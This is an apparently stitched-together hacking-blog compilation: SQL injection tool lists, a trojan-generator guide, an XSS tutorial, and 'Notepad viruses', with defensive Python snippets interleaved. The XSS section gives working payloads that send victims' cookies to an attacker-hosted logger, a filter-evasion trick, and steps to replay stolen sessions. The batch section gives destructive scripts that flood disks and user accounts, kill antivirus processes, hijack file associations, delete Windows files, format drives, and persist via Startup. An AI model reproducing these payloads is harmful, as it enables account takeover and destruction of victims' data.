A large number of websites get hacked due to SQL vulnerabilities, and hackers probably use such techniques to deface websites for reasons of country, caste and religion too. Security starts with you, and you are responsible for your website. If you leave a hole and don't patch it, a hacker will gain access to your admin panel and upload a shell to deface the website. Having a backup of the website is a good thing, but as a result of a defacement the site will be down for a long time, and this will take down your traffic rank as well. The purpose of HT is to raise awareness among you, therefore I am posting some good SQL scanners here. They are automated and will scan for vulnerabilities at one click. This is actually auditing your own website. Look at the list:



1) Automagic SQL Injector

The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided as part of the Applied Hacking & Intrusion Prevention training courses.



In a nutshell it's an automated SQL injection tool designed to help save time on pen tests. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned.



The following features are currently supported:



 * Browse tables and dump table data to a CSV file (2 methods).

 * Upload files using debug script method.

 * Automagical UDP reverse shell

 * Interactive xp_cmdshell (simulated cmd.exe shell)



For a demonstration please visit this

To download the tool: Get here





2) SQLNinja

SQLNinja is a tool to exploit SQL injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Sqlninja is written in Perl and should run on any UNIX-based platform with a Perl interpreter, as long as all needed modules have been installed.

To download the tool : Get Here



3) FG-Injector Framework

FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications and servers. Its features are a proxy for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation.

To download the tool : Get Here



4) SQL Power Injector

SQL Power Injector helps the penetration tester to inject SQL commands on a web page. Its main strength is its capacity to automate tedious blind SQL injection with several threads.

To download the tool : Get Here



5) Blind SQL Injection Perl Tool

bsqlbf.pl is a Perl script that allows users to retrieve information from web sites that are vulnerable to SQL Injection.

To download the tool: Get Here



6) SQL Injection Digger

SQL Injection Digger is a command line program that looks for SQL injections and common errors present in websites. This version can now perform the following operations:

 * Look for SQL injections and common errors in website URLs found by performing a Google search

 * Look for SQL injections and common errors in a given URL or a file with URLs

 * Look for SQL injections and common errors in links from a web page

 * Crawl a website/webpage and do the above

To download the tool: Get Here



7) Absinthe-Blind SQL Injection Tool

Absinthe is a GUI-based (GTK-Sharp) tool that automates the process of downloading the schema and contents of a database that is vulnerable to blind SQL injection. Its features are:

 * Automated SQL Injection

 * Supports MS SQL Server, MSDE, Oracle, Postgres

 * Cookies / Additional HTTP Headers

 * Query Termination

 * Additional text appended to queries

 * Supports Use of Proxies / Proxy Rotation

 * Multiple filters for page profiling

 * Custom Delimiters

To download the tool: Get Here 



8) SQL Map

Sqlmap is an automatic blind SQL injection tool capable of enumerating an entire remote database, performing an active database fingerprint and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantage of web application security flaws.

To download the tool: Get Here



9) BobCat - SQL injection Exploitation Tool

BobCat is a MS Windows based tool to aid a security consultant in taking full advantage of SQL injection vulnerabilities. It is based on a tool named "Data Thief" that was published as PoC by appsecinc. BobCat can exploit SQL injection bugs/opportunities in web applications, independent of language, but dependent on MS SQL as the back end DB.

To download the tool: Get Here



10) SQLibf- SQL Injection Brute Forcer

SQLibf is a SQL injection brute-forcer tool for automating the work of detecting and exploiting SQL injection vulnerabilities. This is not an easy or standalone application. It must be used by a web application auditor to help and complement his findings. SQLibf can work with both visible and blind SQL injection vulnerabilities. It works by doing simple logic SQL operations to determine the level of exposure of the vulnerable application.

To download the tool: Get Here

Trojan horse Generator (Easiest Way)

Today, I am going to teach you how to create your own trojan virus with a piece of software. It's very easy, plain sailing, and everyone can understand it. Read my short guide and enjoy having fun with your own trojan.


THINGS YOU NEED:



>: Getbatch trojan generator. Download here



METHOD:


1: Download trojan generator and open it .






2: A window will pop out like this one:





and type "1" to make trojan and "2" to exit.







3: Now the software will ask about the type of trojan you want to make, so fill in each blank according to your desire, like this:


4: Now it will prompt many options like the ones below. Enter "y" for yes and "n" for no:

After filling in all the blanks, it will make a file in an unknown place with the name TROJAN.




5: Now go to the search column of your Windows and search for "trojan". Windows will show you results with the name trojan; find among them a batch file named trojan.bat, which is your own trojan virus.


Enjoy,

To put this trojan in startup and to play more read the post below by Ali Raza:

Virus Making With TextPad

File Sharing on windowsXP SP3(awesome feature)



This post is about a feature exclusive to Windows XP SP3. If you have a WLAN connection, this may be a very informative and helpful post for you; if you have broadband or some other wired connection, it might not help you. This post will tell you how to upload files to the internet from your PC's documents.


METHOD:

Suppose you want to share the *my pictures* folder. Simply open *my documents* and right-click on the folder icon labelled *my pictures*. Within the context menu, click on the *sharing and security* menu item. This will open the properties box for that folder. In the sharing tab, move your mouse pointer to the second frame and click on *network setup wizard*.





This wizard guides you through different steps, and you may choose to stick with the default options in each step. Once the wizard completes, hit the *finish* button and your computer will be ready to share the folder and its contents on your WLAN.



Back in the *sharing* tab of the *properties* dialog, check the option labelled *share this folder on the network* and give your shared folder a name. This name will be visible to all users who are allowed to access the folder over the network. If you don't want the contents of the folder to be changed over the net, it gives you the option -read only folder-.

Once you are done, click finish. To check whether your folder has been successfully shared on the net, type *//* in the address bar followed by your computer's name, and press *go*. Use the same address that you've just entered in the address bar (//yourpc'sname//) to access this folder from any computer on the WLAN.

Enable Telnet in windows 7



I don't use telnet, but a friend of mine asked about it to play with some commands. I noticed that in Windows 7 it's not working, then I came across a short trick to enable it. Since it is not secure, Windows 7 disabled it, as did Vista, but don't worry, here is a small way:





1.Start



2.Control Panel



3.Programs And Features



4.Turn Windows features on or off



5.Check Telnet Client



6.Hit OK



Hope it may help you someday!

Cross Site Scripting (Using a hole to Hack with XSS)

Today I will go into detail and show you how an XSS hole is used to hack a large number of registered users of a website. A short description of this post is here:

  1. We find a blog which allows users to input data.
  2. This data is displayed, unedited and unsanitised, on the blog index page.
  3. We want to inject an XSS to log the administrative user's cookies.
  4. We want to log in with the cookie we have stolen.
Note: This is for educational purposes, for designers or for my readers to make their websites safe.


What we shall need :

Here's a list of things you will need throughout the tutorial:

Mozilla Firefox (use an old version, not the latest).

FF addon: Add & Edit Cookies.

FF addon: Live HTTP Headers.

An ACTIVE cookie logger. (Google it yourself; I don't want to put it here and break laws.)

A basic understanding of JavaScript is an advantage, but not essential. (Refer to http://www.w3schools.com/)

An XSS vulnerability to test and exploit. Refer to my old post on XSS. Hosting is up to you; try this free PHP web host, 000webhost etc.

The desire and dedication to learn. [Yourself.]



Identifying & Exploiting the Vulnerability:

Identifying an XSS vulnerability can be pretty straightforward in most cases. A typical method of testing for an XSS vulnerability is the infamous 'alert' test. Anyone with a basic knowledge of JavaScript will know what this is. This test makes an alert box, or message box, pop up on the screen. This is done by executing the JavaScript function alert.

<script>alert('hackersthirst.com')</script>
This would display a message box with hackersthirst.com as the message.



To perform this test we want the page in question to print out the script, so the browser will execute it. So in this case using the included vulnerable test page, input the string <script>alert('hackersthirst.com')</script>. Now the page will execute this and you should get an alert box displaying the message 'hackersthirst.com'.



Another method of testing for the vulnerability is the document.write method. The same concepts and structure apply to this method as to the alert method; we're just using the document.write function instead of the alert function. So this time we insert:

<script>document.write('hackersthirst.com')</script>
This time the script will return the string 'hackersthirst.com' (without quotes) and will write it to the page, where the string is supposed to be shown.



Below I am giving a short description of how to exploit this.


Exploiting XSS hole :

What a hacker will do after identifying the XSS hole is demonstrated by the given example.

In this example we will be covering cookie stealing. We will go over setting up our logger and a few methods of doing so.



Example 1 :



Our cookie logger URL : http://mysite.com/logger.php

Vulnerable Page : http://someblog.com/index.php

Injection Point : http://someblog.com/post.php



Now we have all this setup, we can crack on. You can use the following methods to log cookies using JavaScript :

<script>location.href='http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie</script>

<script>document.location='http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie</script>

<script>window.open('http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie)</script>

<script>window.location='http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie</script>



Once you have posted this to the blogging system, and it's echoed on the index.php, we just have to be patient and hope the administrator of the site visits it soon, so we can get their cookie.

Another method I want to go over is the <script src=> method. The only difference with this one is that the main script is kept off-site, and is fetched by the <script src> tag, and then executed on the page. This is advantageous in many ways. It can reduce the size of our script on the target site for one, and secondly it can be changed if we want to change the functionality of our XSS. This type of XSS is usually more practical for worms, and keyloggers, but is definitely worth knowing.



Example 2 :



Our cookie logger URL : http://mysite.com/logger.php

Our script URL : http://mysite.com/script.js

Vulnerable Page : http://someblog.com/index.php

Injection Point : http://someblog.com/post.php



Here is how we include our foreign script :



<script src='http://mysite.com/script.js%27></script>



Inside the script we just need the logger, use a function from Example 1. An example of our script would be :



location.href='http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie;



Again, like anything, patience is a virtue.

Here the site is your own hosting site, which hosts the cookie logger script.


Possible Limitations and Basic Filter Evasion Techniques :

The filter I will show you is a filter which removes the '<script>' and '</script>' tags. While a very basic and common method of filtering, it is ridiculously easy to bypass.

Example 1 ~ Tag Removal :

I insert the JavaScript : '<script>alert('XSS')</script>',

and it returns the string : alert('XSS').

Never fear, there is a way around this. If I now insert this : '<scr<script>ipt>alert('XSS')</scr</script>ipt>'

Now the script will remove the tags, and echo what's left, which is : <script>alert('XSS')</script>.



There are other methods also. Use Google.
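For site owners, the tag-removal case above is the reason to encode output instead of deleting tags. The following is an added example, not code from the original post: it reproduces the filter described in the text, runs it over the two inputs shown, and compares the result with HTML output encoding. The function names and the harmless `<b>` sample are assumptions made for the illustration.

```python
import html
import re

# The filter described above: delete the literal tags <script> and </script>.
SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)
# Anything that still looks like the start of an HTML tag after filtering.
ANY_TAG = re.compile(r"<\s*/?\s*[a-zA-Z]")


def strip_script_tags(text):
    """Single-pass tag removal, as in 'Example 1 ~ Tag Removal'."""
    return SCRIPT_TAG.sub("", text)


def strip_until_stable(text):
    """Repeat the removal until the text stops changing.

    This closes the nesting trick but still only knows about one tag name."""
    previous = None
    while previous != text:
        previous, text = text, SCRIPT_TAG.sub("", text)
    return text


def encode_for_html(text):
    """Output encoding: <, >, &, and quotes become entities, so the browser
    shows the characters instead of parsing them as markup."""
    return html.escape(text, quote=True)


def has_live_markup(rendered):
    """True if the string would still be parsed as a tag by a browser."""
    return ANY_TAG.search(rendered) is not None


# The two inputs from the section, plus a constructed harmless tag.
PLAIN = "<script>alert('XSS')</script>"
NESTED = "<scr<script>ipt>alert('XSS')</scr</script>ipt>"
OTHER_TAG = "<b>hello</b>"  # constructed sample, not from the post


def compare(samples):
    """Run every sample through the three treatments and flag live markup."""
    rows = []
    for sample in samples:
        treatments = {
            "single_pass": strip_script_tags(sample),
            "repeated": strip_until_stable(sample),
            "encoded": encode_for_html(sample),
        }
        rows.append({
            "input": sample,
            **{name: (out, has_live_markup(out)) for name, out in treatments.items()},
        })
    return rows


if __name__ == "__main__":
    for row in compare([PLAIN, NESTED, OTHER_TAG]):
        print(row["input"])
        for name in ("single_pass", "repeated", "encoded"):
            out, live = row[name]
            print(f"  {name:<12} live={live!s:<5} {out}")
```

Only the encoded column is inert for every input and still shows the visitor exactly what was typed; both removal filters pass other markup through unchanged.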





If your hosting site's URL is too long, a smart tip is to use its IP instead of the URL.




What to do when you get cookies in txt. file in hosting :

These are the steps:

  1. Open Firefox.
  2. Click on Tools in the menu bar.
  3. Click on Cookie Editor.
  4. Click on Add.
  5. In name, add the name of that cookie (the bit before the =).
  6. In content, add the value.
  7. In host, add .site.com, unless it's a subdomain or otherwise stated (the dot in front of the domain name is important).
  8. In path, write /, unless you have the exact path where you want the cookie to be active.



Repeat this procedure until every cookie has been added. Once this is done, you can navigate to the website and check to see if you have logged in. So, that's a short guide on XSS.
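The cookie theft and replay described in this guide depend on the session cookie being readable from page script and accepted from any host under the domain. The following is an added example, not part of the original post: a small audit of Set-Cookie header values that reports which cookies are exposed in that way. The header values and function names are constructed for the illustration.

```python
# Constructed Set-Cookie header values (sample data, not captured from a real site).
SAMPLE_HEADERS = [
    "PHPSESSID=3f9a1c; path=/",
    "sid=3f9a1c; Domain=.site.com; Path=/; Secure",
    "__Host-sid=3f9a1c; Path=/; Secure; HttpOnly; SameSite=Lax",
]


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value}).

    Attribute names are lower-cased because they are case-insensitive."""
    first, *rest = [part.strip() for part in header_value.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header_value):
    """Return (cookie name, list of findings) for one Set-Cookie value."""
    name, _, attrs = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attrs:
        # Without HttpOnly, document.cookie hands the value to injected script.
        findings.append("no HttpOnly: readable by script running in the page")
    if "secure" not in attrs:
        findings.append("no Secure: also sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("no SameSite=Lax/Strict")
    if attrs.get("domain"):
        # A Domain attribute widens the cookie to every subdomain (step 7 above).
        findings.append(f"Domain={attrs['domain']}: valid on every subdomain")
    return name, findings


def script_readable(headers):
    """Names of the cookies that page script can read (no HttpOnly flag)."""
    names = []
    for header in headers:
        name, _, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:
            names.append(name)
    return names


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        name, findings = audit_cookie(header)
        print(name, "OK" if not findings else "")
        for finding in findings:
            print("   -", finding)
```

HttpOnly keeps the session value out of reach of script but does not remove the injection itself, so it complements output encoding rather than replacing it.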

21 Hacking Tools

These are Top 20 Hacking Tools, which are used for various purposes.





Nessus



The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.



Ethereal

Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.



Snort

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.



Netcat

Netcat has been dubbed the network Swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using the TCP or UDP protocol.



TCPdump

TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.



Hping

Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).



Dsniff

Dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).



GFI LANguard

GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.



Ettercap

Ettercap is a multipurpose sniffer/interceptor/logger for switched LANs. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.



Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.



John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix.



OpenSSH

OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.



TripWire

Tripwire is a tool that can be used for data and program integrity assurance.



Kismet

Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.



NetFilter

NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packet mangling.



IP Filter

IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.



pf

OpenBSD Packet Filter



fport

fport identifies all open TCP/IP and UDP ports and maps them to the owning application.



SAINT

SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.



OpenPGP

OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.



Brutus



Brutus is a remote password cracker. With its help you can crack FTP etc.


Playing with Notepad (Learn to make simple Viruses)

Hello all! Today I am going to show you some harmless and harmful Notepad viruses. Use the following scripts (some might work in Windows 7 and some in XP) to annoy any friend. Just open Windows Notepad and save them as anything.bat; when the victim runs them, the action will be taken.



Open Unlimited Windows Until Restart :



Echo off

:loop1

start command

start command

start command

start command

start command

start command

start command

start command

start command

start command

goto loop2



:loop2

start command

start command

start command

start command

start command

start command

start command

start command

start command

start command

goto loop1



##########################################


Flood Hard Disk until all the space is taken :

@ECHO OFF

@ECHO A PHOENIX PRODUCTION

@ECHO MAIN BAT RUNNING

GOTO start



:start

@ECHO SET snowball2=1 >> bat6.bat

@ECHO GOTO flood5 >> bat6.bat

@ECHO :flood5 >> bat6.bat

@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat

@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat

@ECHO GOTO flood5 >> bat6.bat

START /MIN bat6.bat

GOTO bat5



:bat5

@ECHO CD %%ProgramFiles%%\ >> bat5.bat

@ECHO SET maggi=1 >> bat5.bat

@ECHO GOTO flood4 >> bat5.bat

@ECHO :flood4 >> bat5.bat

@ECHO MKDIR maggi%%maggi%% >> bat5.bat

@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat

@ECHO GOTO flood4 >> bat5.bat

START /MIN bat5.bat

GOTO bat4



:bat4

@ECHO CD %%SystemRoot%%\ >> bat4.bat

@ECHO SET marge=1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat

@ECHO :flood3 >> bat4.bat

@ECHO MKDIR marge%%marge%% >> bat4.bat

@ECHO SET /a marge=%%marge%%+1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat

START /MIN bat4.bat

GOTO bat3



:bat3

@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat

@ECHO SET bart=1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.bat

@ECHO :flood2 >> bat3.bat

@ECHO MKDIR bart%%bart%% >> bat3.bat

@ECHO SET /a bart=%%bart%%+1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.bat

START /MIN bat3.bat

GOTO bat2



:bat2

@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat

@ECHO SET homer=1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

@ECHO :flood >> bat2.bat

@ECHO MKDIR homer%%homer%% >> bat2.bat

@ECHO SET /a homer=%%homer%%+1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

START /MIN bat2.bat

GOTO original



:original

CD %HomeDrive%\

SET lisa=1

GOTO flood1

:flood1

MKDIR lisa%lisa%

SET /a lisa=%lisa%+1

GOTO flood1


Note : Save this as flood1.bat 


Erase Windows:

erase c:\windows

Shutdown Computer:

@echo off

shutdown -s -t 5 -c "Shutdown"

Multi Function Virus:

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!

This Virus will:



1. End Process, NAVAPSVC.exe

2. End Process, Explorer.exe (taskbar and icons will disappear)

3. End Process, zonelabs.exe

4. associate an exe file with txt (when opening exe files, it will go to notepad)

5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)

6. Deletes Login/Logoff Screens


title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown


How to add created viruses in StartUp:



1) For this you can use the simple code below (abcd is your bat file name):


@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"



and then the rest of the code ..



2) Suppose you want to make shutdown.bat a virus which will copy itself into startup, so that whenever the computer starts it will shut it down in 2 seconds. This is a most dangerous kind of thing, so it is better to create a restore point before working with such files.


@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

@echo off
shutdown -s -t 5 -c "Shutdown"



Save it as abcd.bat. Whenever you run it, it will be saved in your startup folder.



Here the time 5 means that your computer will take 5 seconds to shut down. You can make it 2 as well; then it will be a most dangerous thing to handle .. lol




Format Hard Disk Partitions:



1) format c:\ /Q/X — this will format your drive c:\


01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000



2) format d:\ /Q/X — this will format your drive d:\


01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000
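The batch files in this post rely on a small set of commands: a copy into the Startup folder, a forced shutdown, file association changes, deletion of Windows files, drive formatting, and label/goto loops with no exit. The following is an added example, not part of the original post: a static triage that flags those patterns in a .bat file before anyone runs it. The rule names and regular expressions are choices made for the illustration, and the sample scripts are short excerpts constructed from the listings above.

```python
import re

# Line-level indicators; each pattern mirrors a command used in the scripts above.
LINE_RULES = [
    ("startup-persistence", re.compile(r"\bcopy\b.*\\Start Menu\\Programs\\Startup", re.I)),
    ("forced-shutdown", re.compile(r"\bshutdown\b.*\s[-/]s\b", re.I)),
    ("assoc-hijack", re.compile(r"\bassoc\s+\.(exe|txt)\s*=", re.I)),
    ("system-file-delete", re.compile(r"\b(del|erase)\b.*\\windows\b", re.I)),
    ("disk-format", re.compile(r"\bformat\s+[a-z]:", re.I)),
    ("account-creation", re.compile(r"\bnet\s+user\b.*\s/add\b", re.I)),
    ("drops-batch-file", re.compile(r">>\s*\S+\.bat\b", re.I)),
]
# Commands that consume resources when repeated without a stop condition.
LOOP_BODY = re.compile(r"^\s*@?\s*(mkdir|md|start|net\s+user)\b", re.I)
GOTO = re.compile(r"goto\s+:?(\S+)", re.I)


def find_unbounded_loops(lines):
    """Return (label_line, goto_line) pairs for backward jumps whose body
    creates directories, windows or accounts and contains no IF guard."""
    labels, hits = {}, []
    for number, line in enumerate(lines, 1):
        text = line.strip()
        if text.startswith(":") and not text.startswith("::"):
            labels[text[1:].strip().lower()] = number
            continue
        jump = GOTO.match(text)
        if not jump:
            continue
        target = labels.get(jump.group(1).lower())
        if target is None:  # label not seen yet, so this is a forward jump
            continue
        body = lines[target:number - 1]  # lines between the label and the goto
        guarded = any(re.match(r"\s*if\b", b, re.I) for b in body)
        if not guarded and any(LOOP_BODY.search(b) for b in body):
            hits.append((target, number))
    return hits


def triage(script_text):
    """Return a sorted list of (line_number, rule_name) findings."""
    lines = script_text.splitlines()
    findings = [(number, name)
                for number, line in enumerate(lines, 1)
                for name, rule in LINE_RULES if rule.search(line)]
    findings += [(end, "unbounded-loop") for _, end in find_unbounded_loops(lines)]
    return sorted(findings)


# Constructed excerpts of the listings above, plus a harmless script.
STARTUP_SAMPLE = r'''@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
shutdown -s -t 5 -c "Shutdown"
'''
FLOOD_SAMPLE = r'''SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
'''
BENIGN_SAMPLE = "@echo off\necho Backup finished\n"

if __name__ == "__main__":
    for title, sample in [("startup", STARTUP_SAMPLE), ("flood", FLOOD_SAMPLE),
                          ("benign", BENIGN_SAMPLE)]:
        print(title, triage(sample))
```

A hit is a reason to read the script before running it, not a verdict: legitimate administration scripts also call shutdown or format, so review the flagged lines in context.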